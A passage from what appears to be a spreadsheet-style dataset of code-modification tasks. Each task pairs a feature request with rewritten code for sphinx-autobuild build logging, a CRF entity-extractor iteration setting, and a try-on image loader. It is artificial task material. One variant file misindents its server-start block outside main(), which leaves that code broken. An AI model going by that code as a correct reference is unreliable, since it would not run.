print(f"{Fore.GREEN}[sphinx-autobuild] {colour}{text}{Style.RESET_ALL}")\n\ndef show(*, context=None, command=None):\n    """Show context and command-to-be-executed, with nice formatting and colours."""\n    if context is not None:\n        _log(context, colour=Fore.CYAN)\n    if command is not None:\n        assert isinstance(command, (list, tuple))\n        msg = f"&gt; {shlex.join(command)}"\n        _log(msg, colour=Fore.BLUE)\n\n# #New: Add function to log build status to file\ndef log_build_status(log_file_path, status, context_msg=""):\n    """Log build status with timestamp to a file.\n    \n    Args:\n        log_file_path: Path to the log file\n        status: Build status (\'success\' or \'failure\')\n        context_msg: Optional context message\n    """\n    try:\n        timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")\n        log_message = f"[{timestamp}] Build Status: {status}"\n        if context_msg:\n            log_message += f" - {context_msg}"\n        log_message += "\\n"\n        \n        with open(log_file_path, "a") as f:\n            f.write(log_message)\n    except Exception as e:\n        print(f"Warning: Could not write to build log file: {e}")\n\n---\n\n# sphinx-autobuild/sphinx_autobuild/build.py\nimport subprocess\nimport sys\nfrom pathlib import Path\nfrom sphinx_autobuild.utils import show, log_build_status\n\nclass Builder:\n    def __init__(self, sphinx_args, *, url_host, pre_build_commands, build_log_file=None):\n        self.sphinx_args = sphinx_args\n        self.pre_build_commands = pre_build_commands\n        self.uri = f"http://{url_host}"\n        # #New: Add build log file path\n        self.build_log_file = build_log_file\n\n    def __call__(self, *, rebuild: bool = True):\n        """Generate the documentation using ``sphinx``."""\n        if rebuild:\n            show(context="Detected change. Rebuilding...")\n\n        try:\n            for command in self.pre_build_commands:\n                show(context="pre-build", command=command)\n                subprocess.run(command, check=True)\n        except subprocess.CalledProcessError as e:\n            print(f"Pre-build command exited with exit code: {e.returncode}")\n            print(\n                "Please fix the cause of the error above or press Ctrl+C to stop the "\n                "server."\n            )\n            # #Modify: Log failure status\n            if self.build_log_file:\n                log_build_status(self.build_log_file, "failure", f"Pre-build command failed with exit code {e.returncode}")\n            raise\n\n        show(command=["python", "-m", "sphinx"] + self.sphinx_args)\n        try:\n            subprocess.run(\n                [sys.executable, "-m", "sphinx"] + self.sphinx_args,\n                check=True,\n            )\n            # #Modify: Log success status\n            if self.build_log_file:\n                log_build_status(self.build_log_file, "success", "Sphinx build completed successfully")\n        except subprocess.CalledProcessError as e:\n            print(f"Sphinx exited with exit code: {e.returncode}")\n            print(\n                "The server will continue serving the build folder, but the contents "\n                "being served are no longer in sync with the documentation sources. "\n                "Please fix the cause of the error above or press Ctrl+C to stop the "\n                "server."\n            )\n            # #Modify: Log failure status\n            if self.build_log_file:\n                log_build_status(self.build_log_file, "failure", f"Sphinx exited with code {e.returncode}")\n        # Remind the user of the server URL for convenience.\n        show(context=f"Serving on {self.uri}")\n\n---\n\n# sphinx-autobuild/sphinx_autobuild/__main__.py\n# #Modify: Add build_log_file argument to _add_autobuild_arguments\ndef _add_autobuild_arguments(parser):\n    group = parser.add_argument_group("autobuild options")\n    group.add_argument(\n        "--port",\n        type=int,\n        default=8000,\n        help="port to serve documentation on. 0 means find and use a free port",\n    )\n    group.add_argument(\n        "--host",\n        type=str,\n        default="127.0.0.1",\n        help="hostname to serve documentation on",\n    )\n    group.add_argument(\n        "--re-ignore",\n        action="append",\n        default=[],\n        help="regular expression for files to ignore, when watching for changes",\n    )\n    group.add_argument(\n        "--ignore",\n        action="append",\n        default=[],\n        help="glob expression for files to ignore, when watching for changes",\n    )\n    group.add_argument(\n        "--no-initial",\n        dest="no_initial_build",\n        action="store_true",\n        default=False,\n        help="skip the initial build",\n    )\n    group.add_argument(\n        "--open-browser",\n        action="store_true",\n        default=False,\n        help="open the browser after building documentation",\n    )\n    group.add_argument(\n        "--delay",\n        dest="delay",\n        type=float,\n        default=5,\n        help="how long to wait before opening the browser",\n    )\n    group.add_argument(\n        "--watch",\n        action="append",\n        metavar="DIR",\n        default=[],\n        help="additional directories to watch",\n        dest="additional_watched_dirs",\n    )\n    group.add_argument(\n        "--pre-build",\n        action="append",\n        metavar="COMMAND",\n        default=[],\n        help="additional command(s) to run prior to building the documentation",\n    )\n    # #New: Add build log file argument\n    group.add_argument(\n        "--build-log",\n        type=str,\n        default=None,\n        help="file path to log build status and timestamps",\n        dest="build_log_file",\n    )\n    return group\n\n# #Modify: Update main function to pass build_log_file to Builder\ndef main(argv=()):\n    """Actual application logic."""\n    colorama.just_fix_windows_console()\n    if not argv:\n        argv = sys.argv[1:]\n    args, build_args = _parse_args(list(argv))\n    src_dir = Path(args.sourcedir)\n    out_dir = Path(args.outdir)\n    out_dir.mkdir(parents=True, exist_ok=True)\n    serve_dir = out_dir\n    if args.make_mode_builder:\n        serve_dir = out_dir / args.make_mode_builder\n        serve_dir.mkdir(parents=True, exist_ok=True)\n    host_name = args.host\n    port_num = args.port or find_free_port()\n    url_host = f"{host_name}:{port_num}"\n    pre_build_commands = list(map(shlex.split, args.pre_build))\n    # #Modify: Pass build_log_file to Builder\n    builder = Builder(\n        build_args,\n        url_host=url_host,\n        pre_build_commands=pre_build_commands,\n        build_log_file=args.build_log_file,\n    )\n    watch_dirs = [src_dir] + args.additional_watched_dirs\n    ignore_dirs = [\n        ".git", ".hg", ".idea", ".mypy_cache", "node_modules", ".nox",\n        ".ruff_cache", ".pytest_cache", ".pytype", ".svn", ".tox",\n        ".venv", "venv", ".vscode", *args.ignore, out_dir,\n        args.warnings_file, args.doctree_dir,\n    ]\n    ignore_dirs = list(filter(None, ignore_dirs))\n    ignore_handler = IgnoreFilter(ignore_dirs, args.re_ignore)\n    app = _create_app(watch_dirs, ignore_handler, builder, serve_dir, url_host)\n    if not args.no_initial_build:\n        show(context="Starting initial build")\n        builder(rebuild=False)\n    if args.open_browser:\n        open_browser(url_host, args.delay)\n    show(context="Waiting to detect changes...")\n    try:\n        uvicorn.run(app, host=host_name, port=port_num, log_level="warning")\n    except KeyboardInterrupt:\n        show(context="Server ceasing operations. Cheerio!")'}</t>
  </si>
  <si>
    <t>{'file_1': 'from sphinx_autobuild.utils import show\nimport subprocess\nimport sys\n\nclass Builder:\n    def __init__(self, sphinx_args, *, url_host, pre_build_commands, log_file):\n        self.sphinx_args = sphinx_args\n        self.pre_build_commands = pre_build_commands\n        self.uri = f"http://{url_host}"\n        self.log_file = log_file\n\n    def __call__(self, *, rebuild: bool = True):\n        """Generate the documentation using ``sphinx``."""\n        if rebuild:\n            show(context="Detected change. Rebuilding...")\n\n        try:\n            for command in self.pre_build_commands:\n                show(context="pre-build", command=command)\n                subprocess.run(command, check=True)\n        except subprocess.CalledProcessError as e:\n            print(f"Pre-build command exited with exit code: {e.returncode}")\n            print(\n                "Please fix the cause of the error above or press Ctrl+C to stop the "\n                "server.")\n            raise\n\n        show(command=["python", "-m", "sphinx"] + self.sphinx_args)\n        try:\n            subprocess.run(\n                [sys.executable, "-m", "sphinx"] + self.sphinx_args,\n                check=True,\n            )\n            with open(self.log_file, \'a\') as log:\n                log.write("Build successful\\n")\n        except subprocess.CalledProcessError as e:\n            print(f"Sphinx exited with exit code: {e.returncode}")\n            print(\n                "The server will continue serving the build folder, but the contents "\n                "being served are no longer in sync with the documentation sources. "\n                "Please fix the cause of the error above or press Ctrl+C to stop the "\n                "server.")\n            with open(self.log_file, \'a\') as log:\n                log.write(f"Build failed with exit code: {e.returncode}\\n")\n        # Remind the user of the server URL for convenience.\n        show(context=f"Serving on {self.uri}")', 'file_2': 'import argparse\nimport shlex\nimport sys\nfrom pathlib import Path\n\nimport colorama\nimport uvicorn\n\n# This isn\'t public API, but there aren\'t many better options\nfrom sphinx.cmd.build import get_parser as sphinx_get_parser\nfrom starlette.applications import Starlette\nfrom starlette.middleware import Middleware\nfrom starlette.routing import Mount, WebSocketRoute\nfrom starlette.staticfiles import StaticFiles\n\nfrom sphinx_autobuild import __version__\nfrom sphinx_autobuild.build import Builder\nfrom sphinx_autobuild.filter import IgnoreFilter\nfrom sphinx_autobuild.middleware import JavascriptInjectorMiddleware\nfrom sphinx_autobuild.server import RebuildServer\nfrom sphinx_autobuild.utils import find_free_port, open_browser, show\n\n\ndef main(argv=()):\n    """Actual application logic."""\n    colorama.just_fix_windows_console()\n\n    if not argv:\n        # entry point functions don\'t receive args\n        argv = sys.argv[1:]\n\n    args, build_args = _parse_args(list(argv))\n\n    src_dir = Path(args.sourcedir)\n    out_dir = Path(args.outdir)\n    out_dir.mkdir(parents=True, exist_ok=True)\n\n    serve_dir = out_dir\n    if args.make_mode_builder:\n        serve_dir = out_dir / args.make_mode_builder\n        serve_dir.mkdir(parents=True, exist_ok=True)\n\n    host_name = args.host\n    port_num = args.port or find_free_port()\n    url_host = f"{host_name}:{port_num}"\n\n    pre_build_commands = list(map(shlex.split, args.pre_build))\n\n    log_file = out_dir / "build_log.txt"\n    builder = Builder(\n        build_args,\n        url_host=url_host,\n        pre_build_commands=pre_build_commands,\n        log_file=log_file,\n    )\n\n    watch_dirs = [src_dir] + args.additional_watched_dirs\n    ignore_dirs = ["node_modules", *args.ignore, out_dir, args.warnings_file, args.doctree_dir]\n    ignore_dirs = list(filter(None, ignore_dirs))\n    ignore_handler = IgnoreFilter(ignore_dirs, args.re_ignore)\n    app = _create_app(watch_dirs, ignore_handler, builder, serve_dir, url_host)\n\n    if not args.no_initial_build:\n        show(context="Starting initial build")\n        builder(rebuild=False)\n\n    if args.open_browser:\n        open_browser(url_host, args.delay)\n\n    show(context="Waiting to detect changes...")\ntry:\n    uvicorn.run(app, host=host_name, port=port_num, log_level="warning")\nexcept KeyboardInterrupt:\n    show(context="Server ceasing operations. Cheerio!")', 'file_3': 'import anyio\nfrom watchgod import awatch, InotifyWatcher\n\nclass RebuildServer:\n    def __init__(self, watch_dirs, ignore_handler, change_callback):\n        self.watch_dirs = watch_dirs\n        self.ignore_handler = ignore_handler\n        self.change_callback = change_callback\n\n    async def lifespan(self, app):\n        async with anyio.create_task_group() as task_group:\n            task_group.start_soon(self.watch)\n\n    async def watch(self):\n        async with anyio.create_task_group() as task_group:\n            for watch_dir in self.watch_dirs:\n                task_group.start_soon(self._watch_dir, watch_dir)\n\n    async def _watch_dir(self, watch_dir):\n        async for changes in awatch(watch_dir, watcher=InotifyWatcher):\n            for change in changes:\n                if self.ignore_handler(change[0]):\n                    continue\n                self.change_callback()', 'file_4': 'class JavascriptInjectorMiddleware:\n    def __init__(self, app, ws_url):\n        self.app = app\n        self.ws_url = ws_url\n\n    async def __call__(self, scope, receive, send):\n        if scope["type"] == "http":\n            async def wrapped_send(event):\n                if event["type"] == "http.response.start":\n                    event["headers"] = [*event["headers"], (b"Content-Security-Policy", b"default-src \'self\'; script-src \'self\' \'unsafe-inline\';")]\n                elif event["type"] == "http.response.body":\n                    if event["body"] and b"&lt;/body&gt;" in event["body"]:\n                        event["body"] = event["body"].replace(b"&lt;/body&gt;", f"&lt;script&gt;console.log(\'Connected to {self.ws_url}\');&lt;/script&gt;&lt;/body&gt;".encode())\n                await send(event)\n            await self.app(scope, receive, wrapped_send)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'EntityExtractor.train(self, train_sentences, model_name) method in entity_extractor.py', 'invoking_code_segment': 'train_all_ner(story_id, training_data) function in tasks.py that calls entityExtraction.train(ner_training_data, story_id)', 'feature_description': "Add a new optional parameter 'max_iterations' to the train method in EntityExtractor class to allow specifying the number of iterations for CRF model training. This parameter will be passed from the train_all_ner function in tasks.py and used to configure the trainer's max_iterations setting.", 'modified_complete_code': '# entity_extractor.py - Modified train method\n\ndef train(self, train_sentences, model_name, max_iterations=50):\n    """\n    Train NER model for given model\n    :param train_sentences:\n    :param model_name:\n    :param max_iterations: #New - Number of iterations for training (default: 50)\n    :return:\n    """\n    features = [self.sent_to_features(s) for s in train_sentences]\n    labels = [self.sent_to_labels(s) for s in train_sentences]\n\n    trainer = pycrfsuite.Trainer(verbose=False)\n    for xseq, yseq in zip(features, labels):\n        trainer.append(xseq, yseq)\n\n    trainer.set_params({\n        \'c1\': 1.0,  # coefficient for L1 penalty\n        \'c2\': 1e-3,  # coefficient for L2 penalty\n        \'max_iterations\': max_iterations,  # #Modify - Use parameter instead of hardcoded value\n        # include transitions that are possible, but not observed\n        \'feature.possible_transitions\': True\n    })\n    trainer.train(\'model_files/%s.model\' % model_name)\n    return True\n\n# tasks.py - Modified train_all_ner function\n\ndef train_all_ner(story_id, training_data, max_iterations=50):\n    """\n    Train NER model for single Story\n    :param story_id:\n    :param training_data:\n    :param max_iterations: #New - Number of iterations for training (default: 50)\n    :return:\n    """\n    entityExtraction = EntityExtractor()\n    # generate crf training data\n    ner_training_data = entityExtraction.json2crf(training_data)\n    # train and store ner model\n    entityExtraction.train(ner_training_data, story_id, max_iterations)  # #Modify - Pass max_iterations parameter\n\n# tasks.py - Modified train_models function\n\ndef train_models():\n    """\n    Initiate NER and Intent Classification training\n    :return:\n    """\n    # generate intent classifier training data\n    intents = Intent.objects\n\n    if not intents:\n        raise Exception("NO_DATA")\n\n    # train intent classifier on all intents\n    train_intent_classifier(intents)\n\n    # train ner model for each Stories\n    for intent in intents:\n        train_all_ner(intent.intentId, intent.trainingData)  # #Modify - Can now optionally pass max_iterations parameter'}</t>
  </si>
  <si>
    <t>{'file_1': "class EntityExtractor:\n    def train(self, train_sentences, model_name, max_iterations=50):  #Modify\n        features = [self.sent_to_features(s) for s in train_sentences]\n        labels = [self.sent_to_labels(s) for s in train_sentences]\n\n        trainer = pycrfsuite.Trainer(verbose=False)\n        for xseq, yseq in zip(features, labels):\n            trainer.append(xseq, yseq)\n\n        trainer.set_params({\n            'c1': 1.0,  # coefficient for L1 penalty\n            'c2': 1e-3,  # coefficient for L2 penalty\n            'max_iterations': max_iterations,  #Modify\n\n            # include transitions that are possible, but not observed\n            'feature.possible_transitions': True\n        })\n        trainer.train('model_files/%s.model' % model_name)\n        return True", 'file_2': 'def train_all_ner(story_id, training_data, max_iterations=50):  #Modify\n    entityExtraction = EntityExtractor()\n    ner_training_data = entityExtraction.json2crf(training_data)\n    entityExtraction.train(ner_training_data, story_id, max_iterations)  #Modify', 'file_3': 'def train_models():\n    intents = Intent.objects\n    if not intents:\n        raise Exception("NO_DATA")\n    train_intent_classifier(intents)\n    for intent in intents:\n        train_all_ner(intent.intentId, intent.trainingData, max_iterations=100)  #Modify\n    update_model()', 'file_4': "@nlu.route('/build_models', methods=['POST'])\ndef build_models():\n    train_models()\n    return build_response.sent_ok()"}</t>
  </si>
  <si>
    <t>{'called_code_segment': "class Dataset(data.Dataset):\n    def __init__(self, args, dataroot_path: str, phase: str, order: str = 'paired', category: List[str] = ['dresses', 'upper_body', 'lower_body'], size: Tuple[int, int] = (256, 192)):\n        ...\n    def __getitem__(self, index):\n        ...\n        result = {\n            'c_name': c_name,\n            'im_name': im_name,\n            'cloth': cloth,\n            'image': im,\n            'im_cloth': im_cloth,\n            'shape': shape,\n            'im_head': im_head,\n            'im_pose': im_pose,\n            'pose_map': pose_map,\n            'parse_array': parse_array,\n            'dense_labels': labels,\n            'dense_uv': uv,\n            'skeleton': skeleton,\n            'm': im_mask,\n            'parse_mask_total': parse_mask_total,\n        }\n        return result", 'invoking_code_segment': 'def test_unpaired(dataloader, model, e, args):\n    with tqdm(desc="Iteration %d - images extraction" % e, unit=\'it\', total=len(dataloader.data_loader)) as pbar:\n        for step in range(0, len(dataloader.data_loader)):\n            inputs = dataloader.next_batch()\n            with torch.no_grad():\n                image_name = inputs[\'im_name\']\n                cloth_name = inputs[\'c_name\']\n                image = inputs[\'image\'].cuda()\n                cloth = inputs[\'cloth\'].cuda()\n                cropped_cloth = inputs[\'im_cloth\'].cuda()\n                im_head = inputs[\'im_head\'].cuda()\n                pose_map = inputs[\'pose_map\'].cuda()\n                skeleton = inputs[\'skeleton\'].cuda()\n                im_pose = inputs[\'im_pose\'].cuda()\n                shape = inputs[\'shape\'].cuda()\n                parse_array = inputs[\'parse_array\'].cuda()\n                dense_labels = inputs[\'dense_labels\'].cuda()\n                dense_uv = inputs[\'dense_uv\'].cuda()\n                parse_array = sem2onehot(18, parse_array)', 'feature_description': 'Add a feature to save the generated images during the test phase. This includes modifying the Dataset class to support output directory specification and adding image saving functionality in the test_unpaired function.', 'modified_complete_code': '#File 1: dress-code/data/dataset.py\nimport cv2\nimport torch\nimport torch.utils.data as data\nimport torchvision.transforms as transforms\nfrom PIL import Image, ImageDraw\nimport os\nimport numpy as np\nimport json\nfrom typing import List, Tuple\nfrom data.labelmap import label_map\nfrom numpy.linalg import lstsq\n\nclass Dataset(data.Dataset):\n    def __init__(self, args, dataroot_path: str,\n                 phase: str,\n                 order: str = \'paired\',\n                 category: List[str] = [\'dresses\', \'upper_body\', \'lower_body\'],\n                 size: Tuple[int, int] = (256, 192),\n                 output_dir: str = None):  #New: Add output_dir parameter\n        """\n        Initialize the PyTroch Dataset Class\n        :param args: argparse parameters\n        :type args: argparse\n        :param dataroot_path: dataset root folder\n        :type dataroot_path:  string\n        :param phase: phase (train | test)\n        :type phase: string\n        :param order: setting (paired | unpaired)\n        :type order: string\n        :param category: clothing category (upper_body | lower_body | dresses)\n        :type category: list(str)\n        :param size: image size (height, width)\n        :type size: tuple(int)\n        :param output_dir: directory to save generated images\n        :type output_dir: string\n        """\n        super(Dataset, self).__init__()\n        self.args = args\n        self.dataroot = dataroot_path\n        self.phase = phase\n        self.category = category\n        self.height = size[0]\n        self.width = size[1]\n        self.radius = args.radius\n        self.output_dir = output_dir  #New: Store output directory\n        #New: Create output directory if it doesn\'t exist\n        if self.output_dir and not os.path.exists(self.output_dir):\n            os.makedirs(self.output_dir)\n        \n        self.transform = transforms.Compose([\n            transforms.ToTensor(),\n            transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n        ])\n        self.transform2D = transforms.Compose([\n            transforms.ToTensor(),\n            transforms.Normalize((0.5, ), (0.5, ))\n        ])\n\n        im_names = []\n        c_names = []\n        dataroot_names = []\n\n        for c in category:\n            assert c in [\'dresses\', \'upper_body\', \'lower_body\']\n\n            dataroot = os.path.join(self.dataroot, c)\n            if phase == \'train\':\n                filename = os.path.join(dataroot, f"{phase}_pairs.txt")\n            else:\n                filename = os.path.join(dataroot, f"{phase}_pairs_{order}.txt")\n            with open(filename, \'r\') as f:\n                for line in f.readlines():\n                    im_name, c_name = line.strip().split()\n                    im_names.append(im_name)\n                    c_names.append(c_name)\n                    dataroot_names.append(dataroot)\n\n        self.im_names = im_names\n        self.c_names = c_names\n        self.dataroot_names = dataroot_names\n\n    def __getitem__(self, index):\n        """\n        For each index return the corresponding sample in the dataset\n        :param index: data index\n        :type index: int\n        :return: dict containing dataset samples\n        :rtype: dict\n        """\n        c_name = self.c_names[index]\n        im_name = self.im_names[index]\n        dataroot = self.dataroot_names[index]\n\n        # Clothing image\n        cloth = Image.open(os.path.join(dataroot, \'images\', c_name))\n        cloth = cloth.resize((self.width, self.height))\n        cloth = self.transform(cloth)   # [-1,1]\n\n        # Person image\n        im = Image.open(os.path.join(dataroot, \'images\', im_name))\n        im = im.resize((self.width, self.height))\n        im = self.transform(im)   # [-1,1]\n\n        # Skeleton\n        skeleton = Image.open(os.path.join(dataroot, \'skeletons\', im_name.replace("_0", "_5")))\n        skeleton = skeleton.resize((self.width, self.height))\n        skeleton = self.transform(skeleton)\n\n        # Label Map\n        parse_name = im_name.replace(\'_0.jpg\', \'_4.png\')\n        im_parse = Image.open(os.path.join(dataroot, \'label_maps\', parse_name))\n        im_parse = im_parse.resize((self.width, self.height), Image.NEAREST)\n        parse_array = np.array(im_parse)\n\n        parse_shape = (parse_array &gt; 0).astype(np.float32)\n\n        parse_head = (parse_array == 1).astype(np.float32) + \\\n                     (parse_array == 2).astype(np.float32) + \\\n                     (parse_array == 3).astype(np.float32) + \\\n                     (parse_array == 11).astype(np.float32)\n\n        parser_mask_fixed = (parse_array == label_map["hair"]).astype(np.float32) + \\\n                            (parse_array == label_map["left_shoe"]).astype(np.float32) + \\\n                            (parse_array == label_map["right_shoe"]).astype(np.float32) + \\\n                            (parse_array == label_map["hat"]).astype(np.float32) + \\\n                            (parse_array == label_map["sunglasses"]).astype(np.float32) + \\\n                            (parse_array == label_map["scarf"]).astype(np.float32) + \\\n                            (parse_array == label_map["bag"]).astype(np.float32)\n\n        parser_mask_changeable = (parse_array == label_map["background"]).astype(np.float32)\n\n        arms = (parse_array == 14).astype(np.float32) + (parse_array == 15).astype(np.float32)\n\n        if dataroot.split(\'/\')[-1] == \'dresses\':\n            label_cat = 7\n            parse_cloth = (parse_array == 7).astype(np.float32)\n            parse_mask = (parse_array == 7).astype(np.float32) + \\\n                         (parse_array == 12).astype(np.float32) + \\\n                         (parse_array == 13).astype(np.float32)\n            parser_mask_changeable += np.logical_and(parse_array, np.logical_not(parser_mask_fixed))\n\n        elif dataroot.split(\'/\')[-1] == \'upper_body\':\n            label_cat = 4\n            parse_cloth = (parse_array == 4).astype(np.float32)\n            parse_mask = (parse_array == 4).astype(np.float32)\n\n            parser_mask_fixed += (parse_array == label_map["skirt"]).astype(np.float32) + \\\n                                 (parse_array == label_map["pants"]).astype(np.float32)\n\n            parser_mask_changeable += np.logical_and(parse_array, np.logical_not(parser_mask_fixed))\n        elif dataroot.split(\'/\')[-1] == \'lower_body\':\n            label_cat = 6\n            parse_cloth = (parse_array == 6).astype(np.float32)\n            parse_mask = (parse_array == 6).astype(np.float32) + \\\n                         (parse_array == 12).astype(np.float32) + \\\n                         (parse_array == 13).astype(np.float32)\n\n            parser_mask_fixed += (parse_array == label_map["upper_clothes"]).astype(np.float32) + \\\n                                 (parse_array == 14).astype(np.float32) + \\\n                                 (parse_array == 15).astype(np.float32)\n            parser_mask_changeable += np.logical_and(parse_array, np.logical_not(parser_mask_fixed))\n\n        parse_head = torch.from_numpy(parse_head)  # [0,1]\n        parse_cloth = torch.from_numpy(parse_cloth)   # [0,1]\n        parse_mask = torch.from_numpy(parse_mask)  # [0,1]\n        parser_mask_fixed = torch.from_numpy(parser_mask_fixed)\n        parser_mask_changeable = torch.from_numpy(parser_mask_changeable)\n\n        # dilation\n        parse_without_cloth = np.logical_and(parse_shape, np.logical_not(parse_mask))\n        parse_mask = parse_mask.cpu().numpy()\n\n        # Masked cloth\n        im_head = im * parse_head - (1 - parse_head)\n        im_cloth = im * parse_cloth + (1 - parse_cloth)\n\n        # Shape\n        parse_shape = Image.fromarray((parse_shape * 255).astype(np.uint8))\n        parse_shape = parse_shape.resize((self.width // 16, self.height // 16), Image.BILINEAR)\n        parse_shape = parse_shape.resize((self.width, self.height), Image.BILINEAR)\n        shape = self.transform2D(parse_shape)  # [-1,1]\n\n        # Load pose points\n        pose_name = im_name.replace(\'_0.jpg\', \'_2.json\')\n        with open(os.path.join(dataroot, \'keypoints\', pose_name), \'r\') as f:\n            pose_label = json.load(f)\n            pose_data = pose_label[\'keypoints\']\n            pose_data = np.array(pose_data)\n            pose_data = pose_data.reshape((-1, 4))\n\n        point_num = pose_data.shape[0]\n        pose_map = torch.zeros(point_num, self.height, self.width)\n        r = self.radius * (self.height/512.0)\n        im_pose = Image.new(\'L\', (self.width, self.height))\n        pose_draw = ImageDraw.Draw(im_pose)\n        neck = Image.new(\'L\', (self.width, self.height))\n        neck_draw = ImageDraw.Draw(neck)\n        for i in range(point_num):\n            one_map = Image.new(\'L\', (self.width, self.height))\n            draw = ImageDraw.Draw(one_map)\n            point_x = np.multiply(pose_data[i, 0], self.width/384.0)\n            point_y = np.multiply(pose_data[i, 1], self.height/512.0)\n            if point_x &gt; 1 and point_y &gt; 1:\n                draw.rectangle((point_x - r, point_y - r, point_x + r, point_y + r), \'white\', \'white\')\n                pose_draw.rectangle((point_x - r, point_y - r, point_x + r, point_y + r), \'white\', \'white\')\n                if i == 2 or i == 5:\n                    neck_draw.ellipse((point_x - r*4, point_y - r*4, point_x + r*4, point_y + r*4), \'white\', \'white\')\n            one_map = self.transform2D(one_map)\n            pose_map[i] = one_map[0]\n\n        # just for visualization\n        im_pose = self.transform2D(im_pose)\n\n        im_arms = Image.new(\'L\', (self.width, self.height))\n        arms_draw = ImageDraw.Draw(im_arms)\n        if dataroot.split(\'/\')[-1] == \'dresses\' or dataroot.split(\'/\')[-1] == \'upper_body\':\n            with open(os.path.join(dataroot, \'keypoints\', pose_name), \'r\') as f:\n                data = json.load(f)\n                shoulder_right = np.multiply(tuple(data[\'keypoints\'][2][:2]), self.height / 512.0)\n                shoulder_left = np.multiply(tuple(data[\'keypoints\'][5][:2]), self.height / 512.0)\n                elbow_right = np.multiply(tuple(data[\'keypoints\'][3][:2]), self.height / 512.0)\n                elbow_left = np.multiply(tuple(data[\'keypoints\'][6][:2]), self.height / 512.0)\n                wrist_right = np.multiply(tuple(data[\'keypoints\'][4][:2]), self.height / 512.0)\n                wrist_left = np.multiply(tuple(data[\'keypoints\'][7][:2]), self.height / 512.0)\n                if wrist_right[0] &lt;= 1. and wrist_right[1] &lt;= 1.:\n                    if elbow_right[0] &lt;= 1. and elbow_right[1] &lt;= 1.:\n                        arms_draw.line(np.concatenate((wrist_left, elbow_left, shoulder_left, shoulder_right)).astype(np.uint16).tolist(), \'white\', 30, \'curve\')\n                    else:\n                        arms_draw.line(np.concatenate((wrist_left, elbow_left, shoulder_left, shoulder_right, elbow_right)).astype(np.uint16).tolist(), \'white\', 30, \'curve\')\n                elif wrist_left[0] &lt;= 1. and wrist_left[1] &lt;= 1.:\n                    if elbow_left[0] &lt;= 1. and elbow_left[1] &lt;= 1.:\n                        arms_draw.line(np.concatenate((shoulder_left, shoulder_right, elbow_right, wrist_right)).astype(np.uint16).tolist(), \'white\', 30, \'curve\')\n                    else:\n                        arms_draw.line(np.concatenate((elbow_left, shoulder_left, shoulder_right, elbow_right, wrist_right)).astype(np.uint16).tolist(), \'white\', 30, \'curve\')\n                else:\n                    arms_draw.line(np.concatenate((wrist_left, elbow_left, shoulder_left, shoulder_right, elbow_right, wrist_right)).astype(np.uint16).tolist(),\'white\', 30, \'curve\')\n\n            if self.args.height &gt; 512:\n                im_arms = cv2.dilate(np.float32(im_arms), np.ones((10, 10), np.uint16), iterations=5)\n            hands = np.logical_and(np.logical_not(im_arms), arms)\n            parse_mask += im_arms\n            parser_mask_fixed += hands\n\n        #delete neck\n        parse_head_2 = torch.clone(parse_head)\n        if dataroot.split(\'/\')[-1] == \'dresses\' or dataroot.split(\'/\')[-1] == \'upper_body\':\n            with open(os.path.join(dataroot, \'keypoints\', pose_name), \'r\') as f:\n                data = json.load(f)\n                points = []\n                points.append(np.multiply(tuple(data[\'keypoints\'][2][:2]), self.height/512.0))\n                points.append(np.multiply(tuple(data[\'keypoints\'][5][:2]), self.height/512.0))\n                x_coords, y_coords = zip(*points)\n                A = np.vstack([x_coords, np.ones(len(x_coords))]).T\n                m, c = lstsq(A, y_coords, rcond=None)[0]\n                for i in range(parse_array.shape[1]):\n                    y = i * m + c\n                    parse_head_2[int(y - 20*(self.height/512.0)):, i] = 0\n\n        parser_mask_fixed = np.logical_or(parser_mask_fixed, np.array(parse_head_2, dtype=np.uint16))\n        parse_mask += np.logical_or(parse_mask, np.logical_and(np.array(parse_head, dtype=np.uint16), np.logical_not(np.array(parse_head_2, dtype=np.uint16))))\n\n        if self.args.height &gt; 512:\n            parse_mask = cv2.dilate(parse_mask, np.ones((20, 20), np.uint16), iterations=5)\n        else:\n            parse_mask = cv2.dilate(parse_mask, np.ones((5, 5), np.uint16), iterations=5)\n        parse_mask = np.logical_and(parser_mask_changeable, np.logical_not(parse_mask))\n        parse_mask_total = np.logical_or(parse_mask, parser_mask_fixed)\n        im_mask = im * parse_mask_total\n        parse_mask_total = parse_mask_total.numpy()\n        parse_mask_total = parse_array * parse_mask_total\n        parse_mask_total = torch.from_numpy(parse_mask_total)\n\n        uv = np.load(os.path.join(dataroot, \'dense\', im_name.replace(\'_0.jpg\', \'_5_uv.npz\')))\n        uv = uv[\'uv\']\n        uv = torch.from_numpy(uv)\n        uv = transforms.functional.resize(uv, (self.height, self.width))\n\n        labels = Image.open(os.path.join(dataroot, \'dense\', im_name.replace(\'_0.jpg\', \'_5.png\')))\n        labels = labels.resize((self.width, self.height), Image.NEAREST)\n        labels = np.array(labels)\n\n        result = {\n            \'c_name\': c_name,  # for visualization\n            \'im_name\': im_name,  # for visualization or ground truth\n            \'cloth\': cloth,  # for input\n            \'image\': im,  # for visualization\n            \'im_cloth\': im_cloth,  # for ground truth\n            \'shape\': shape,  # for visualization\n            \'im_head\': im_head,  # for visualization\n            \'im_pose\': im_pose,  # for visualization\n            \'pose_map\': pose_map,\n            \'parse_array\': parse_array,\n            \'dense_labels\': labels,\n            \'dense_uv\': uv,\n            \'skeleton\': skeleton,\n            \'m\': im_mask,  # for input\n            \'parse_mask_total\': parse_mask_total,\n            \'output_dir\': self.output_dir,  #New: Add output directory to result\n        }\n\n        return result\n\n    def __len__(self):\n        return len(self.c_names)\n\n\n#File 2: dress-code/main.py\nimport torch\nimport os  #New: Import os for directory operations\nfrom PIL import Image  #New: Import Image for saving\nimport torchvision.transforms as transforms  #New: Import transforms for denormalization\n\nfrom data import Dataset, DataLoader\nfrom tqdm import tqdm\nfrom utils import sem2onehot\nimport conf\n\n\n#New: Helper function to denormalize and save images\ndef save_image(tensor, output_path):\n    """\n    Save a tensor image to disk\n    :param tensor: image tensor with values in [-1, 1]\n    :param output_path: path to save the image\n    """\n    # Denormalize from [-1, 1] to [0, 1]\n    tensor = (tensor + 1) / 2\n    tensor = torch.clamp(tensor, 0, 1)\n    # Convert to PIL Image\n    if tensor.dim() == 3:\n        tensor = tensor.unsqueeze(0)\n    tensor = tensor.squeeze(0)\n    img = transforms.ToPILImage()(tensor.cpu())\n    img.save(output_path)\n\n\ndef test_unpaired(dataloader, model, e, args):\n    with tqdm(desc="Iteration %d - images 